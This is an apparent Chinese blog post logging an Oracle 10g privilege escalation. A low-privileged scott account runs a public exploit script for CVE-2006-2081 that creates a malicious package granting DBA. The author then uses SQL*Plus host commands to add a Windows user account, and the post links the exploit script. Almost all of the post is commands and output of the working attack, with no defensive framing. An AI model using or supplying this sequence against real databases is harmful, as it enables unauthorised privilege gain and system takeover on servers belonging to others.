标签:uil mini ted options win2003 2.0 dba grant iat
一直想摸索一下orcl提权的方式,今天测试了一下10g,可以成功提权。
C:\wmpub>sqlplus scott/tiger@orcl
SQL*Plus: Release 10.2.0.1.0 - Production on 星期一 10月 31 07:41:29 2016
Copyright (c) 1982, 2005, Oracle. All rights reserved.
连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
SQL> @dbms_exp_ext.sql
[+] dbms_exp_ext.sql exploit (CVE-2006-2081)
[+] by Andrea "bunker" Purificato - http://rawlab.mindcreations.com
[+] 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
Target username (default TEST): scott
[-] Wait...
程序包已创建。
[-] Building evil package...
原值 6: EXECUTE IMMEDIATE ‘GRANT DBA TO &the_user‘;
新值 6: EXECUTE IMMEDIATE ‘GRANT DBA TO scott‘;
程序包体已创建。
[-] Finishing evil package...
PL/SQL 过程已成功完成。
[-] YOU GOT THE POWAH!!
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT RESOURCE NO YES NO
SQL> host net user xiaozi xiaozi /add;
命令成功完成。
SQL> host net user;
\\WIN2003-WVS2 的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_SNOWW-2CD7D87E5 IWAM_SNOWW-2CD7D87E5 SUPPORT_388945a0
xiaozi
命令成功完成。
提权脚本:http://rawlab.mindcreations.com/codes/exploit/oracle/dbms_exp_ext.sql
标签:uil mini ted options win2003 2.0 dba grant iat
原文地址:http://www.cnblogs.com/xiaozi/p/6016117.html